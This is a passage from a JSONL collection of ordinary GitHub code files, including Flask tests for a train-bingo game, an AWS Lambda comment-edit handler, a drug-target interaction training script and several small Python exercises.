' in rv.data\n # Check if the right tz is displayed in the db\n db_time = session.query(db.BingoSquares.check_time).filter(\n db.BingoSquares.bingo_field_id == game_pk, db.BingoSquares.x_position == 3,\n db.BingoSquares.y_position == 3\n ).one()[0]\n if dst:\n assert db_time == tz_time + timedelta(hours=3)\n else:\n assert db_time == tz_time + timedelta(hours=2)\n\n\ndef test_cheater_prevention(client):\n \"\"\" Check whether fields finished within 2 hours are detected as cheaters \"\"\"\n with app.app_context():\n # Create a field\n rv = client.post('/', data=dict(player_name=\"cheater\"))\n game_link = rv.location[-11:-1]\n session = db.get_session()\n game_pk = session.query(db.BingoField.id).filter(db.BingoField.link == game_link).one()[0]\n rv = client.get(f'/{game_link}/')\n assert b'Spieler: cheater' in rv.data\n # Tick five fields right now\n for x, y in product((1, 1, 1, 1), (1, 2, 3, 4)):\n rv = client.post(f'/{game_link}/submit/{x}/{y}/')\n assert {'data': 'success', 'x': x, 'y': y} == rv.get_json()\n rv = client.post(f'/{game_link}/submit/1/5/')\n assert {'data': 'cheater'} == rv.get_json()\n # Check if field has been deleted\n assert 0 == session.query(db.BingoField).filter(db.BingoField.id == game_pk).count()\n assert 0 == session.query(db.BingoSquares).filter(db.BingoSquares.bingo_field_id == game_pk).count()\n\n # Tick five fields after 1:55 hours\n with freeze_time(datetime.now()) as frozen_time:\n rv = client.post('/', data=dict(player_name=\"cheater155\"))\n game_link = rv.location[-11:-1]\n game_pk = session.query(db.BingoField.id).filter(db.BingoField.link == game_link).one()[0]\n rv = client.get(f'/{game_link}/')\n assert b'Spieler: cheater155' in rv.data\n # Wait 1:55 hours\n frozen_time.tick(delta=timedelta(hours=1, minutes=55))\n # Tick five fields now\n for x, y in product((1, 1, 1, 1), (1, 2, 3, 4)):\n rv = client.post(f'/{game_link}/submit/{x}/{y}/')\n assert {'data': 'success', 'x': x, 'y': y} == rv.get_json()\n rv = client.post(f'/{game_link}/submit/1/5/')\n assert {'data': 'cheater'} == rv.get_json()\n # Check if field has been deleted\n assert 0 == session.query(db.BingoField).filter(db.BingoField.id == game_pk).count()\n assert 0 == session.query(db.BingoSquares).filter(db.BingoSquares.bingo_field_id == game_pk).count()\n\n # Tick four fields after 1:55 hours and fifth after 2:05 hours – Should pass\n with freeze_time(datetime.now()) as frozen_time:\n rv = client.post('/', data=dict(player_name=\"legit\"))\n game_link = rv.location[-11:-1]\n game_pk = session.query(db.BingoField.id).filter(db.BingoField.link == game_link).one()[0]\n rv = client.get(f'/{game_link}/')\n assert b'Spieler: legit' in rv.data\n # Wait 1:55 hours\n frozen_time.tick(delta=timedelta(hours=1, minutes=55))\n # Tick four fields now\n for x, y in product((1, 1, 1, 1), (1, 2, 3, 4)):\n rv = client.post(f'/{game_link}/submit/{x}/{y}/')\n assert {'data': 'success', 'x': x, 'y': y} == rv.get_json()\n # Wait 10 minutes\n frozen_time.tick(delta=timedelta(minutes=10))\n rv = client.post(f'/{game_link}/submit/1/5/')\n assert {'data': 'finished', 'score': (1000000/125)} == rv.get_json()\n # Check if field is finished\n game = session.query(db.BingoField).filter(db.BingoField.id == game_pk).one()\n assert game.score == 1000000 / 125\n assert game.finished\n\n\ndef test_bingo_scoring(client):\n \"\"\" Test whether score matches our expectations\"\"\"\n with app.app_context():\n # Check scores after 3, 5, 24, 48, 96, 300 and 700 hours (after that the cookie expired)\n for hours in [3, 5, 24, 48, 
96, 300, 700]:\n with freeze_time(datetime.now()) as frozen_time:\n rv = client.post('/', data=dict(player_name=f\"{hours}hour\"))\n game_link = rv.location[-11:-1]\n session = db.get_session()\n game_pk = session.query(db.BingoField.id).filter(db.BingoField.link == game_link).one()[0]\n rv = client.get(f'/{game_link}/')\n assert f'Spieler: {hours}hour'.encode() in rv.data\n # Wait some hours\n frozen_time.tick(delta=timedelta(hours=hours))\n # Create a bingo\n for x, y in product((1, 1, 1, 1), (1, 2, 3, 4)):\n rv = client.post(f'/{game_link}/submit/{x}/{y}/')\n assert {'data': 'success', 'x': x, 'y': y} == rv.get_json()\n rv = client.post(f'/{game_link}/submit/1/5/')\n assert {'data': 'finished', 'score': int(1000000 / (60*hours))} == rv.get_json()\n # Check if field is finished and score matches our expectation\n game = session.query(db.BingoField).filter(db.BingoField.id == game_pk).one()\n assert game.score == int(1000000 / (60*hours))\n assert game.finished\n\n\ndef test_cron(client):\n \"\"\"Test if /cron/ cleans up properly\"\"\"\n with app.app_context():\n with freeze_time(datetime.now()) as frozen_time:\n rv = client.post('/', data=dict(player_name=\"dead\"))\n dead_link = rv.location[-11:-1]\n session = db.get_session()\n dead_pk = session.query(db.BingoField.id).filter(db.BingoField.link == dead_link).one()[0]\n rv = client.get(f'/{dead_link}/')\n assert b'Spieler: dead' in rv.data\n rv = client.post('/', data=dict(player_name=\"cookie\"))\n cookie_link = rv.location[-11:-1]\n session = db.get_session()\n rv = client.get(f'/{cookie_link}/')\n assert b'Spieler: cookie' in rv.data\n rv = client.post(f'/{cookie_link}/submit/3/3/')\n assert {'data': 'success', 'x': 3, 'y': 3} == rv.get_json()\n # Wait seven days\n frozen_time.tick(delta=timedelta(days=8))\n rv = client.get('/cron/')\n assert {'data': 'success', 'finished': [dead_link]} == rv.get_json()\n # Check if the dead game has been deleted\n assert 0 == session.query(db.BingoField).filter(db.BingoField.id == dead_pk).count()\n assert 0 == session.query(db.BingoSquares).filter(db.BingoSquares.bingo_field_id == dead_pk).count()\n # Check if the slow game is still there\n assert 1 == session.query(db.BingoField).filter(db.BingoField.link == cookie_link).count()\n # Wait some more days\n frozen_time.tick(delta=timedelta(days=60))\n # Check another field for the cookie game\n rv = client.post(f'/{cookie_link}/submit/2/3/')\n assert {'data': 'success', 'x': 2, 'y': 3} == rv.get_json()\n # Wait a some time\n frozen_time.tick(delta=timedelta(days=40))\n # Game should NOT be finished now\n rv = client.get('/cron/')\n assert {'data': 'success', 'finished': []} == rv.get_json()\n assert 1 == session.query(db.BingoField).filter(db.BingoField.link == cookie_link).count()\n # Wait a long time now (game is dead)\n frozen_time.tick(delta=timedelta(days=100))\n rv = client.get('/cron/')\n assert {'data': 'success', 'finished': [cookie_link]} == rv.get_json()\n assert session.query(db.BingoField.finished).filter(db.BingoField.link == cookie_link).one()[0]\n assert session.query(db.BingoField.score).filter(db.BingoField.link == cookie_link).one()[0] is None\n","repo_name":"Niduroki/bahn-bingo","sub_path":"test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":13921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25240459956","text":"# 16.12\n# 使用csv.DictWriter对象写入csv文件\nimport csv\n\n\ndef writecsv2(csvfilepath):\n headers = [\"name\", \"age\", \"\", \"\", 
\"\"]\n rows = [{\"name\": \"zhangsan\", \"age\": 20}, {\"name\": \"lisi\", \"age\": 30}]\n with open(csvfilepath, \"w\", newline=\"\") as f:\n f_csv = csv.DictWriter(f, fieldnames=headers)\n f_csv.writeheader(headers)\n f_csv.writerows(rows)\n\n\nif __name__ == \"__main__\":\n writecsv2(r\"d:\\pythonpa\\test.csv\")\n","repo_name":"Oxidaner/python-exercises-answers","sub_path":"myclass/16.0/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23008677185","text":"import os\r\nimport sys\r\nimport getopt\r\nfrom typing import Dict\r\n\r\nfrom thebox.common.config import Config\r\nfrom thebox.common_svc.logging import setup_service_logger\r\nfrom thebox.common_svc.api_service_wrapper import create_app, APIResource\r\n\r\nimport thebox.orchestrator.orchestrator_api as api\r\nimport thebox.orchestrator.orchestrator_service as svc\r\n\r\ndef parse_arguments(args) -> Dict:\r\n \"\"\"Parse commandline arguments and return a dictionary of arguments\r\n \r\n Arguments:\r\n args {[type]} -- Arguments passed from CLI\r\n \r\n Returns:\r\n Dict -- dictionary of supported config values; None if invalid commands\r\n\r\n \"\"\"\r\n\r\n try:\r\n opts, args = getopt.getopt(args, \"hc:\", [\"config=\"])\r\n except getopt.GetoptError:\r\n return None\r\n\r\n parsed_args = {}\r\n\r\n for opt, arg in opts:\r\n if opt == '-h':\r\n printhelp()\r\n sys.exit()\r\n elif opt in (\"-c\", \"--config\"):\r\n parsed_args['config'] = arg\r\n\r\n return parsed_args\r\n\r\ndef print_help():\r\n print(\"\"\"\r\nUsage:\r\n python3 -m thebox_orchestrator [-c|--config ]\r\n \"\"\")\r\n\r\ndef main(args=None):\r\n\r\n parsed_args = parse_arguments(args)\r\n if parsed_args is None:\r\n print_help()\r\n\r\n default_cfg_path = os.path.join(os.path.dirname(__file__), \"config.yml\")\r\n cfg_path = parsed_args.get('config', default_cfg_path)\r\n cfg = Config(cfg_path)\r\n\r\n log = setup_service_logger(verbose=True)\r\n log.debug(f\"Starting up using config '{cfg_path}' ...\")\r\n\r\n api_resources = [\r\n APIResource(\r\n api.OrchestrationServiceAPI, \r\n '/scenario',\r\n svc.OrchestrationService(cfg)\r\n )\r\n ]\r\n\r\n app = create_app(\"ochestrator\", api_resources)\r\n app.run(host='0.0.0.0', debug=True)\r\n\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv[1:])\r\n","repo_name":"bhairavmehta2016/enterprisenew","sub_path":"thebox/services/src/thebox/orchestrator/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35580290022","text":"from math import sqrt\r\n\r\n\r\n\r\ndef delta(a, b, c):\r\n return (b**2 - 4 * a * c)\r\n\r\ndef main():\r\n #calcula as raizes de uma equação de segundo grau\r\n a = float(input('Entre com o índice \"a\": '))\r\n b = float(input('Entre com o índice \"b\": '))\r\n c = float(input('Entre com o índice \"c\": '))\r\n imprime_raizes(a, b, c)\r\n\r\ndef imprime_raizes(a, b, c):\r\n d = delta(a, b, c)\r\n if d < 0:\r\n print('\\nNão existe solução real possível \\nas raizes são imaginárias.')\r\n if d == 0:\r\n r = -b/(2*a)\r\n print(\"\"\"Existe uma única raiz \\ne vale:\r\n r = {:.3f}\"\"\".format(r))\r\n if d > 0:\r\n r1 = (-b + sqrt(d))/(2*a)\r\n r2 = (-b - sqrt(d))/(2*a)\r\n print(\"\"\"As raizes são Reais \\ne valem:\r\n r1 = {:.3f}\r\n r2 = {:.3f}\"\"\".format(r1, r2))\r\n","repo_name":"Arduinobymyself/COURSERA","sub_path":"semana 5 - 
equacao_segundo_grau.py","file_name":"semana 5 - equacao_segundo_grau.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"21792729991","text":"import dgl\nfrom utils import *\nfrom model import *\nfrom tqdm import tqdm\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport dgl.nn.pytorch as dglnn\nfrom sklearn.metrics import roc_auc_score, f1_score\nimport warnings\nimport os\nfrom sklearn.metrics.pairwise import cosine_similarity as cos\n\nwarnings.filterwarnings(\"ignore\")\nseed = 47\nargs = setup(default_configure,seed)\ns = 47\nin_size = 512\nhidden_size = 256\nout_size = 128\ndropout = 0.5\nlr = 0.0001\nweight_decay = 1e-10\nepochs = 1000\ncl_loss_co = 1\nreg_loss_co = 0.0001\nfold = 0\ndir = \"../modelSave\"\n\nargs['device'] = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n\n\n\ndtidata, graph, num, all_meta_paths = load_dataset(\"../data/\")\n\n\ndti_label = torch.tensor(dtidata[:, 2:3]).to(args['device'])\n\n\n#torch.Tensor().long()\n#高斯初始化\nnum_protein = 2694\nnum_drug = 2634\n\nhd = torch.randn((num_drug, in_size))\nhp = torch.randn((num_protein, in_size))\nfeatures_d = hd.to(args['device'])\nfeatures_p = hp.to(args['device'])\nnode_feature = [features_d, features_p]\n#得到边的关系\ndti_cl = get_clGraph(dtidata, \"dti\").to(args['device'])\n\ncl = dti_cl\ndata = dtidata\nlabel = dti_label\n\n\ndef main(tr,te,seed):\n all_acc = []\n all_roc = []\n all_pr = []\n for i in range(len(tr)):\n f = open(f\"{i}foldtrain.txt\",\"w\",encoding=\"utf-8\")\n train_index = tr[i]\n for train_index_one in train_index:\n f.write(f\"{train_index_one}\\n\")\n test_index = te[i]\n f = open(f\"{i}foldtest.txt\",\"w\",encoding=\"utf-8\")\n for train_index_one in test_index:\n f.write(f\"{train_index_one}\\n\")\n model = DMNDTI(\n num_drug=num_drug,\n num_protein=num_protein,\n all_meta_paths=all_meta_paths,\n in_size=[hd.shape[1], hp.shape[1]],\n hidden_size=[hidden_size, hidden_size],\n hidden_size1 = out_size,\n out_size=[out_size, out_size],\n dropout=dropout,\n ).to(args['device'])\n # model.load_state_dict(torch.load(f\"{dir}/net{i}.pth\"))\n optim = torch.optim.Adam(lr=lr, weight_decay=weight_decay, params=model.parameters())\n best_acc = 0\n best_pr = 0\n best_roc = 0\n for epoch in tqdm(range(epochs)):\n loss, train_acc, task1_roc, task1_pr,test_acc, test_roc, test_pr = train(model,optim,\n train_index,\n test_index,\n epoch, i)\n\n if test_acc > best_acc:\n best_acc = test_acc\n if test_pr > best_pr:\n best_pr = test_pr\n if test_roc > best_roc:\n best_roc = test_roc\n # torch.save(obj=model.state_dict(), f=f\"{dir}/net.pth\")\n\n all_acc.append(best_acc)\n all_roc.append(best_roc)\n all_pr.append(best_pr)\n print(f\"fold{i} auroc is {best_roc:.4f} aupr is {best_pr:.4f} \")\n\n print(f\"{sum(all_acc) / len(all_acc):.4f}, {sum(all_roc) / len(all_roc):.4f} ,{sum(all_pr) / len(all_pr):.4f}\")\n\ndef train(model, optim,train_index,test_index, epoch,fold):\n model.train()\n d, p, out = model(graph, node_feature, train_index, data)\n train_acc = (out.argmax(dim=1) == label[train_index].reshape(-1)).sum(dtype=float) / len(train_index)\n\n task1_roc = get_roc(out, label[train_index])\n task1_pr = get_pr(out, label[train_index])\n\n loss = F.nll_loss(out, label[train_index].reshape(-1).long())\n optim.zero_grad()\n loss.backward()\n optim.step()\n print(f\" {epoch} epoch loss {loss:.4f} train is acc {train_acc:.4f}, train roc is {task1_roc:.4f},train pr 
is{task1_pr}\")\n te_acc, te_task1_roc1, te_task1_pr = main_test(model, d, p, test_index, epoch, fold)\n\n return loss.item(), train_acc, task1_roc, task1_pr, te_acc, te_task1_roc1, te_task1_pr\n\n\ndef main_test(model, d, p, test_index, epoch, fold):\n model.eval()\n # model(graph, node_feature, train_index, data)\n out = model(graph, node_feature, test_index, data, iftrain=False, d=d, p=p)\n\n acc1 = (out.argmax(dim=1) == label[test_index].reshape(-1)).sum(dtype=float) / len(test_index)\n\n task_roc = get_roc(out, label[test_index])\n\n task_pr = get_pr(out, label[test_index])\n\n return acc1, task_roc, task_pr\n\n\ntrain_indeces, test_indeces = get_cross(dtidata)\nmain(train_indeces, test_indeces, seed)\n","repo_name":"ningq669/DMNDTI","sub_path":"dtiseed/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"19068704182","text":"#!/usr/bin/env python\n# encoding=utf-8\n\nimport socket\n\ndef convert_integer():\n data = 1234\n\n # 32-bits, n:network, h:host l:long\n host_byte_32 = socket.ntohl(data)\n net_byte_32 = socket.htonl(data)\n print(\"Original: {} => Long host byte order: {}, network byte order: {}\".format(data, host_byte_32, net_byte_32))\n\n # 16-bits, 和上面的一样\n host_byte_16 = socket.ntohs(data)\n net_byte_16 = socket.htons(data)\n print(\"Original: {} => short host byte order: {}, network byte order: {}\".format(data, host_byte_16, net_byte_16))\n\n\nif __name__ == \"__main__\":\n convert_integer()","repo_name":"wwxFromTju/python-network","sub_path":"base/convert_integer.py","file_name":"convert_integer.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10603890128","text":"import os\nimport boto3\nimport json\nimport datetime\nimport logging\nfrom backend.common.validators import validate\nfrom backend.handlers.comments.commentService import get_single_comment\n\n# Create a logger object to log the events\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\ndynamodb = boto3.resource(\"dynamodb\")\ns3c = boto3.client(\"s3\")\n\nresponse = {\n \"statusCode\": 200,\n \"body\": \"\",\n \"headers\": {\n \"Content-Type\": \"application/json\",\n \"Access-Control-Allow-Credentials\": True,\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Headers\": \"Content-Type\",\n \"Access-Control-Allow-Methods\": \"OPTIONS,POST,GET\",\n },\n}\n\ncomment_database = None\n\ntry:\n comment_database = os.environ[\"COMMENT_STORAGE_TABLE_NAME\"]\nexcept:\n logger.info(\"Failed Loading Environment Variables\")\n response[\"statusCode\"] = 500\n response[\"body\"] = json.dumps({\"message\": \"Failed Loading Environment Variables\"})\n\n\ndef edit_comment(assetId: str, assetVersionIdAndCommentId: str, event: dict) -> dict:\n \"\"\"\n Checks comment ownership then edits the comment to reflect the changes\n :param assetId: string containing the assetId of the comment\n :param assetVersionIdAndCommentId: string with the asset version id and the unique comment id of the comment\n :param event: Lambda event dictionary\n :returns: dictionary with status code and success info\n \"\"\"\n response = {\"statusCode\": 404, \"message\": \"Record not found\"}\n logger.info(\"Setting Table\")\n logger.info(comment_database)\n table = dynamodb.Table(comment_database)\n logger.info(\"Setting Time Stamp\")\n dtNow = 
datetime.datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\")\n logger.info(\"current time in ISO8601:\" + dtNow)\n\n item = get_single_comment(assetId, assetVersionIdAndCommentId)\n if item:\n logger.info(item)\n logger.info(\"Validating owner\")\n\n if item[\"commentOwnerID\"] != event[\"requestContext\"][\"authorizer\"][\"jwt\"][\"claims\"][\"sub\"]:\n response[\"statusCode\"] = 401\n response[\"message\"] = \"Unauthorized\"\n return response\n\n try:\n table.update_item(\n Key={\n \"assetId\": assetId,\n \"assetVersionId:commentId\": assetVersionIdAndCommentId,\n },\n UpdateExpression=\"set commentBody=:b, dateEdited=:d\",\n ExpressionAttributeValues={\n \":b\": event[\"body\"][\"commentBody\"],\n \":d\": dtNow,\n },\n )\n except Exception as e:\n logger.error(e)\n response[\"statusCode\"] = 400\n response[\"message\"] = e\n return response\n\n response[\"statusCode\"] = 200\n response[\"message\"] = \"Succeeded\"\n return response\n\n\ndef lambda_handler(event: dict, context: dict) -> dict:\n \"\"\"\n Lambda handler for API calls that try to add a comment\n :param event: Lamdba event dictionary\n :param context: Lambda context disctionary\n :returns: Http response object (statusCode, headers, body)\n \"\"\"\n logger.info(event)\n response = {\n \"statusCode\": 200,\n \"body\": \"\",\n \"headers\": {\n \"Content-Type\": \"application/json\",\n \"Access-Control-Allow-Credentials\": True,\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Headers\": \"Content-Type\",\n \"Access-Control-Allow-Methods\": \"OPTIONS,POST,GET\",\n },\n }\n\n try:\n if isinstance(event[\"body\"], str):\n event[\"body\"] = json.loads(event[\"body\"])\n except Exception as e:\n response[\"statusCode\"] = 400\n response[\"body\"] = {\"message\": e}\n return response\n\n pathParameters = event.get(\"pathParameters\", {})\n logger.info(pathParameters)\n\n try:\n # error if no assetId in api call\n if \"assetId\" not in pathParameters:\n message = \"No assetId in API Call\"\n response[\"statusCode\"] = 400\n response[\"body\"] = json.dumps({\"message\": message})\n return response\n\n split_arr = pathParameters[\"assetVersionId:commentId\"].split(\":\")\n logger.info(\"Validating parameters\")\n (valid, message) = validate(\n {\n \"assetId\": {\"value\": pathParameters[\"assetId\"], \"validator\": \"ID\"},\n \"commentId\": {\"value\": split_arr[1], \"validator\": \"ID\"},\n }\n )\n\n if not valid:\n logger.warning(message)\n response[\"body\"] = json.dumps({\"message\": message})\n response[\"statusCode\"] = 400\n return response\n\n logger.info(\"Trying to get edit comment\")\n # call the edit_comment function if everything is valid\n returned = edit_comment(pathParameters[\"assetId\"], pathParameters[\"assetVersionId:commentId\"], event)\n response[\"statusCode\"] = returned[\"statusCode\"]\n response[\"body\"] = json.dumps({\"message\": returned[\"message\"]})\n logger.info(response)\n return response\n except Exception as e:\n response[\"statusCode\"] = 500\n logger.error(\"Error!\", e.__class__, \"occurred.\")\n try:\n logger.info(e)\n response[\"body\"] = json.dumps({\"message\": str(e)})\n except:\n logger.info(\"Can't Read Error\")\n response[\"body\"] = json.dumps({\"message\": \"An unexpected error occurred while executing the request\"})\n return 
response\n","repo_name":"awslabs/visual-asset-management-system","sub_path":"backend/backend/handlers/comments/editComment.py","file_name":"editComment.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"61"} +{"seq_id":"40677533365","text":"import os\nimport joblib\ndef get_model():\n model_path = os.environ.get('MODEL_PATH','src/models/best_model_47_5%.pkl')\n if os.path.exists(model_path):\n model_fit = joblib.load(model_path)\n return model_fit\n # else:\n # return {\"error\": \"Model file not found\"}\n else:\n raise FileNotFoundError(f\"Model file not found at {model_path}\")","repo_name":"juliocesarjcrs/data_science_app_expense_control","sub_path":"api/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28431539643","text":"#informe.py\r\n\r\n#Author: Lucas Pangaro\r\n#Mail: Pangaro.lucas@gmail.com\r\n\r\n# import informe\r\n# informe.informe_camion('../Data/camion.csv', '../Data/precios.csv')\r\n\r\n# ..:EJERCICIO 9.8:..\r\nfrom fileparse import parse_csv\r\nimport lote\r\nimport formato_tabla\r\n#%%\r\ndef leer_precios(archivo):\r\n '''Creo un diccionario con los productos y precios de venta del negocio'''\r\n \r\n with open (archivo, 'rt') as file:\r\n precios = parse_csv(file, types=[str,float], has_headers=False)\r\n \r\n #\"precios\" es una lista de tuplas\r\n d = {}\r\n for tupla in precios:\r\n d[tupla[0]] = tupla[1]\r\n \r\n return d\r\n\r\n\r\ndef leer_camion(archivo):\r\n '''\r\n lee un archivo con el contenido de un camion y devuelva \r\n una lista de instancias de Lote\r\n '''\r\n with open (archivo, 'rt') as file:\r\n dic_camion = parse_csv(file, select = ['nombre', 'cajones', 'precio'], types = [str, int, float])\r\n\r\n camion = [ lote.Lote(d['nombre'], d['cajones'], d['precio']) for d in dic_camion]\r\n \r\n \r\n return camion\r\n\r\n\r\ndef hacer_informe(camion, dic_precios):\r\n lista_de_tuplas = []\r\n cambio = 0.0\r\n for s in camion:\r\n cambio = dic_precios[s.nombre] - s.precio\r\n tupla = (s.nombre, s.cajones, s.precio, cambio)\r\n lista_de_tuplas.append(tupla)\r\n \r\n return lista_de_tuplas\r\n\r\n\r\ndef imprimir_informe(data_informe, formateador):\r\n \r\n formateador.encabezado(['Nombre', 'Cantidad', 'Precio', 'Cambio'])\r\n for nombre, cajones, precio, cambio in data_informe:\r\n rowdata = [ nombre, str(cajones), f'{precio:0.2f}', f'{cambio:0.2f}' ]\r\n formateador.fila(rowdata)\r\n\r\n\r\ndef informe_camion(archivo_camion, archivo_precios, fmt = 'txt'):\r\n '''\r\n Crea un informe con la carga de un camión\r\n a partir de archivos camion y precio.\r\n El formato predeterminado de la salida es .txt\r\n Alternativas: .csv o .html\r\n '''\r\n # Lee archivos de datos\r\n camion = leer_camion(archivo_camion)\r\n precios = leer_precios(archivo_precios)\r\n\r\n # Crea la data del informe\r\n data_informe = hacer_informe(camion, precios)\r\n\r\n # Imprime el informe\r\n formateador = formato_tabla.crear_formateador(fmt)\r\n imprimir_informe(data_informe, formateador)\r\n\r\n \r\n#%%\r\ndef main(args):\r\n if len(args) == 4:\r\n informe_camion(args[1], args[2], args[3])\r\n elif len(args) == 3:\r\n informe_camion(args[1], args[2])\r\n else:\r\n raise SystemExit('Uso: %s archivo_camion archivo_precios formato' % args[0])\r\n \r\n#%%\r\nif __name__ == '__main__':\r\n import sys\r\n 
main(sys.argv)","repo_name":"lpangaro/python-UNSAM","sub_path":"Notas/ejercicios_python/Clase09/informe.py","file_name":"informe.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23574486461","text":"\nimport sys\nimport math\n\nntests = int(sys.stdin.readline())\n\nfor ncase in range(ntests):\n N, M = map(int, sys.stdin.readline().split(' '))\n input_str = '{0} {1}\\n'.format(N, M)\n grid = [['.' for i in range(N)] for j in range(N)]\n orig_grid = [['.' for i in range(N)] for j in range(N)]\n for i in range(M):\n line = sys.stdin.readline()\n input_str += line + '\\n'\n a, r, c = line.split(' ')\n grid[int(r) - 1][int(c) - 1] = a\n orig_grid[int(r) - 1][int(c) - 1] = a\n \n rGrid = [[a in ['x', 'o'] for a in row] for row in grid]\n bGrid = [[a in ['+', 'o'] for a in row] for row in grid]\n\n additions = {}\n\n def logGrid(g = grid):\n print('grid:')\n for r in g:\n print(''.join(r))\n print()\n\n # logGrid()\n\n def addItem(r, c, v):\n other = '+' if v == 'x' else 'x'\n if grid[r][c] == '.':\n grid[r][c] = v\n additions[(r, c)] = v\n elif grid[r][c] == other:\n grid[r][c] = 'o'\n additions[(r, c)] = 'o'\n\n while True:\n # logGrid()\n emptyRow = None\n emptyCol = None\n for i in range(N):\n isEmptyRow = True\n isEmptyCol = True\n for j in range(N):\n if rGrid[i][j]: isEmptyRow = False\n if rGrid[j][i]: isEmptyCol = False\n if isEmptyRow: emptyRow = i\n if isEmptyCol: emptyCol = i\n # print(emptyRow, emptyCol)\n if emptyRow is None: break\n rGrid[emptyRow][emptyCol] = True\n addItem(emptyRow, emptyCol, 'x')\n\n # logGrid()\n\n def distToEdge(r, c):\n return min(N - r - 1, N - c - 1, r, c)\n \n def canPlaceB(r0, c0):\n for r1 in range(N):\n for c1 in range(N):\n if ((r0 + c0 == r1 + c1) or (r0 - c0 == r1 - c1)) and bGrid[r1][c1]: return False\n return True\n\n markedGrid = [[False for c in row] for row in grid]\n\n def tryMark(r, c):\n if 0 <= r < N and 0 <= c < N: markedGrid[r][c] = True\n\n def markLocation(r, c):\n bGrid[r][c] = True\n addItem(r, c, '+')\n for i in range(-N+1, N):\n tryMark(r + i, c + i)\n tryMark(r + i, c - i)\n\n for i in range(N):\n for j in range(N):\n if bGrid[i][j]: markLocation(i, j)\n\n for d in range((N // 2) + 1):\n for i in range(d, N-d):\n for j in range(d, N-d):\n if distToEdge(i, j) != d or markedGrid[i][j]: continue\n markLocation(i, j)\n\n def value(v):\n vals = { '+': 1, 'x': 1, 'o': 2 }\n return 0 if v not in vals else vals[v]\n\n # logGrid()\n\n total = sum(sum(value(a) for a in row) for row in grid)\n\n expected = 2 * N + max(0, N - 2)\n\n '''\n if total != expected:\n print(input_str, file=sys.stderr)\n logGrid(orig_grid)\n logGrid()\n raise BaseException(\"total {0} not the same as expected {1}\".format(total, expected))\n '''\n\n result = '{0} {1}'.format(total, len(additions))\n\n print('Case #{0}: {1}'.format(ncase + 1, result), file=sys.stderr)\n print('Case #{0}: {1}'.format(ncase + 1, result))\n for (r, c), v in sorted(additions.items()):\n print('{0} {1} {2}'.format(v, r + 1, c + 1))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_202/75.py","file_name":"75.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39613113814","text":"from rest_framework import serializers\nfrom rest_framework.relations import PrimaryKeyRelatedField, ManyRelatedField\n\n\nclass 
ZdSModelSerializer(serializers.ModelSerializer):\n def get_fields(self):\n fields = super().get_fields()\n\n request = self._context.get(\"request\")\n if request is None:\n return fields\n\n expands = request.GET.getlist(\"expand\")\n if expands:\n fields = self._update_expand_fields(fields, expands)\n\n x_data_format = request.META.get(\"HTTP_X_DATA_FORMAT\") or \"Markdown\"\n if hasattr(self.Meta, \"formats\"):\n fields = self._update_format_fields(fields, x_data_format)\n\n return fields\n\n def _update_expand_fields(self, fields, expands):\n assert hasattr(\n self.Meta, \"serializers\"\n ), 'Class {serializer_class} missing \"Meta.serializers\" attribute'.format(\n serializer_class=self.__class__.__name__\n )\n\n dict_serializers = dict()\n for serializer in self.Meta.serializers:\n dict_serializers[serializer.Meta.model] = serializer\n\n for expand in expands:\n field = fields.get(expand)\n args = {}\n current_serializer = None\n\n try:\n if isinstance(field, PrimaryKeyRelatedField):\n current_serializer = dict_serializers[field.queryset.model]\n elif isinstance(field, ManyRelatedField):\n current_serializer = dict_serializers[field.child_relation.queryset.model]\n args = {\"many\": True}\n\n assert (\n current_serializer is not None\n ), \"You cannot expand a field without a serializer of the same model.\"\n except KeyError:\n continue\n\n fields[expand] = current_serializer(**args)\n\n return fields\n\n def _update_format_fields(self, fields, x_data_format=\"Markdown\"):\n assert hasattr(self.Meta, \"formats\"), 'Class {serializer_class} missing \"Meta.formats\" attribute'.format(\n serializer_class=self.__class__.__name__\n )\n\n for current in self.Meta.formats:\n if current != x_data_format:\n fields.pop(self.Meta.formats[current])\n\n return fields\n","repo_name":"zestedesavoir/zds-site","sub_path":"zds/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"61"} +{"seq_id":"7230449898","text":"\nnumvalid = 0\n\nwith open(\"day0201.txt\", \"r\") as f:\n for line in f:\n (nums, letter, pw) = line.split()\n mn,mx = nums.split('-')\n letter = letter[:-1]\n mn = int(mn) - 1 # using 1 index :(\n mx = int(mx) - 1 # using 1 index :(\n if mx < len(pw):\n if pw[mn] == letter 